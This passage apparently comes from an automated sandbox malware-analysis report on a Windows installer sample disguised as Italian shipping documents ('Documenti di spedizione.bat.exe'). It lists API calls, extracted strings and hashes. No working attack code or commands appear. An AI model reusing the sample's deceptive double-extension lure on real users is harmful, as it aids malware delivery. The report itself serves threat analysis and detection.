                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                              • Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                              • Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll), ref: 0040517E
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402D33
                                            • ShowWindow.USER32(00000000,00000005), ref: 00402D41
                                              • Part of subcall function 00402C8F: MulDiv.KERNEL32(00036602,00000064,00038FA0), ref: 00402CA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 722711167-2449383134
                                            • Opcode ID: 78a221e97a99680450e3ca11bf4e3b45821cb4013d8a2558b5166950edff25d0
                                            • Instruction ID: 547fa0e596d0efa3134ade0ba199646732fee1a7f54f1ab5f8be41358a9578df
                                            • Opcode Fuzzy Hash: 78a221e97a99680450e3ca11bf4e3b45821cb4013d8a2558b5166950edff25d0
                                            • Instruction Fuzzy Hash: DC019BB0906614E7EB21BB64EF0DEDE766CEB04701B444037F405B11E5C7B89941D79E
                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049F6
                                            • GetMessagePos.USER32 ref: 004049FE
                                            • ScreenToClient.USER32(?,?), ref: 00404A18
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A2A
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                            • Instruction ID: 2232a7e87341d92c9ad346ae082ec06308d60ff2d87fc7f715a57a5a5eae5b25
                                            • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                            • Instruction Fuzzy Hash: E5018071E40219BADB00DB94CC41BFEBBB8AB45711F10412BBA10B61C0D7B465018BA5
                                            APIs
                                            • GetDC.USER32(?), ref: 00401D98
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                            • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                            • CreateFontIndirectA.GDI32(0040A808), ref: 00401E1A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID: Calibri
                                            • API String ID: 3808545654-1409258342
                                            • Opcode ID: 7163b3b0dcdfa28c572866efb14d0ddf6d6d7c1142750631c0734f8fd9b33859
                                            • Instruction ID: 31dc6bfce766dd2e9c365b6b9c1ce0fa0646d0edadaed3ffd0317ad467dc8ee1
                                            • Opcode Fuzzy Hash: 7163b3b0dcdfa28c572866efb14d0ddf6d6d7c1142750631c0734f8fd9b33859
                                            • Instruction Fuzzy Hash: 1E017572948340AFE7006B74AE4EB993FF4DB95315F10847AF201B62E2C6B905528F6E
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                            • wsprintfA.USER32 ref: 00402C62
                                            • SetWindowTextA.USER32(?,?), ref: 00402C72
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C84
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                            • API String ID: 1451636040-1158693248
                                            • Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                            • Instruction ID: e0e458c2d16b5d3c5a169a1492fe07981551179f6e5c56f92d0567975436b572
                                            • Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                            • Instruction Fuzzy Hash: 35F0317090420DABEF205F60CD0AFAE3769EB04345F00C43AFA16B51D0D7B99A55CB59
                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                            • GlobalFree.KERNEL32(?), ref: 004027F2
                                            • GlobalFree.KERNEL32(00000000), ref: 00402805
                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: 7d68071d91978c31b4045b951977b232c33a3f1e4c4fbf1767583406490216b2
                                            • Instruction ID: 589acf511f7bba285ed25554ef0f071862dbcd9cf46fffc414e4c77000f41e55
                                            • Opcode Fuzzy Hash: 7d68071d91978c31b4045b951977b232c33a3f1e4c4fbf1767583406490216b2
                                            • Instruction Fuzzy Hash: 5E219A71C04128BBCF216FA5CE89DAE7A79AF09324F14423AF520762E1C6795D40DBA9
                                            APIs
                                            • lstrlenA.KERNEL32(Gazi Setup: Installing,Gazi Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                            • wsprintfA.USER32 ref: 00404977
                                            • SetDlgItemTextA.USER32(?,Gazi Setup: Installing), ref: 0040498A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$Gazi Setup: Installing
                                            • API String ID: 3540041739-585448583
                                            • Opcode ID: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                            • Instruction ID: 7f1be1aa0c85ccb86495671cb382a06f82cddcf8175a130fa0267404931b34df
                                            • Opcode Fuzzy Hash: bf1bdcac2109adbb76e2cfdf4929b7a7dc251d6602f1380599200b875f001fd7
                                            • Instruction Fuzzy Hash: CF11B7736041283BDB0065799D45EAF3298DB85374F250637FA25F21D1E978CC1255EC
                                            APIs
                                            • SetWindowTextA.USER32(00000000,00422F20), ref: 00403BD4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: TextWindow
                                            • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$1033$Gazi Setup: Installing$-L
                                            • API String ID: 530164218-2088520502
                                            • Opcode ID: 67c3d82ce6484f9e1e19bcd04ff1a02b9bccfbab982ecba75f5a52bbb9d475e3
                                            • Instruction ID: c62297436265aa8c4426bdacc88999ed38b20c31bf5381ba95a45bc0aedbf607
                                            • Opcode Fuzzy Hash: 67c3d82ce6484f9e1e19bcd04ff1a02b9bccfbab982ecba75f5a52bbb9d475e3
                                            • Instruction Fuzzy Hash: 6711D8B1B046119BC730AF15DD50A77777DEB8475A328813FE901A73D2C73DAE029A98
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: FreeGlobal
                                            • String ID:
                                            • API String ID: 2979337801-0
                                            • Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                            • Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
                                            • Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                            • Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2
                                            APIs
                                            • GetDlgItem.USER32(?), ref: 00401D3F
                                            • GetClientRect.USER32(00000000,?), ref: 00401D4C
                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D6D
                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D7B
                                            • DeleteObject.GDI32(00000000), ref: 00401D8A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: b98f244c4997ac906f623e123468edec3404108b831d84f192b6a7b6dae47352
                                            • Instruction ID: 3a73a5ecaa8fddf8dab02391599d10e6f088d4e67d6af50185a53a7dc2f76cba
                                            • Opcode Fuzzy Hash: b98f244c4997ac906f623e123468edec3404108b831d84f192b6a7b6dae47352
                                            • Instruction Fuzzy Hash: D6F0FFB2A04119BFDB11EBA4DE88DAFBBBCEB44301B104476F601F2191C6749D018B79
                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 0040596F
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032AC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 00405978
                                            • lstrcatA.KERNEL32(?,00409014), ref: 00405989
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405969
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-823278215
                                            • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                            • Instruction ID: 4e6a192690b432b60a96f5238a9074c153a0d937d76e079e8aa32f917c06b110
                                            • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                            • Instruction Fuzzy Hash: 7FD0A9A2A09930AAD31222158C05EAB6A4CCF42310B0A0062F200B22E2C77C0D418BFE
                                            APIs
                                            • CharNextA.USER32(?,?,C:\,?,00405A6E,C:\,C:\,75923410,?,75922EE0,004057B9,?,75923410,75922EE0,00000000), ref: 00405A10
                                            • CharNextA.USER32(00000000), ref: 00405A15
                                            • CharNextA.USER32(00000000), ref: 00405A29
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\
                                            • API String ID: 3213498283-3404278061
                                            • Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                            • Instruction ID: f957f906ea029efbd3510901c55ab9b0ae73d09d1d9c73be6bc34f8378a19dae
                                            • Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                            • Instruction Fuzzy Hash: C2F0C291B04FA06FFB32A2681C84F775A88CB55710F04116BE180662C2C2785C418F9A
                                            APIs
                                            • CloseHandle.KERNEL32(000002A0,C:\Users\user\AppData\Local\Temp\,004035BC,?), ref: 00403797
                                            • CloseHandle.KERNEL32(000002D0,C:\Users\user\AppData\Local\Temp\,004035BC,?), ref: 004037AB
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040378A
                                            • C:\Users\user\AppData\Local\Temp\nsgDADD.tmp, xrefs: 004037BB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsgDADD.tmp
                                            • API String ID: 2962429428-1412976865
                                            • Opcode ID: 8243f35e0eeb5762c06f3a20855541ba65908ed27c56bedd9f13c791d511c691
                                            • Instruction ID: 4fe8f3727f95cb8dfcfe97d6293448c3a92072a7c91c92fe8e25374afea9a46a
                                            • Opcode Fuzzy Hash: 8243f35e0eeb5762c06f3a20855541ba65908ed27c56bedd9f13c791d511c691
                                            • Instruction Fuzzy Hash: E6E08CB0900620DAC524AF7CBD859463B289B41335760C726F578F30F2C338AE875AAC
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004050B3
                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00405104
                                              • Part of subcall function 00404128: SendMessageA.USER32(0001048C,00000000,00000000,00000000), ref: 0040413A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                            • Instruction ID: e292fc6bb5149b142bd52d3e096dd2ae09329e4c6d4eed70fd370e7000aba408
                                            • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                            • Instruction Fuzzy Hash: B2018F71504609ABDF205F11ED84AEF3765EB84750F208037FA01B92D1C77A9D92AFAE
                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402DB6,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 004059B6
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DB6,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 004059C4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-1246513382
                                            • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                            • Instruction ID: 4c364b2a586e3df4272a597733e657329f4de9264f8513980004e000b8aa575c
                                            • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
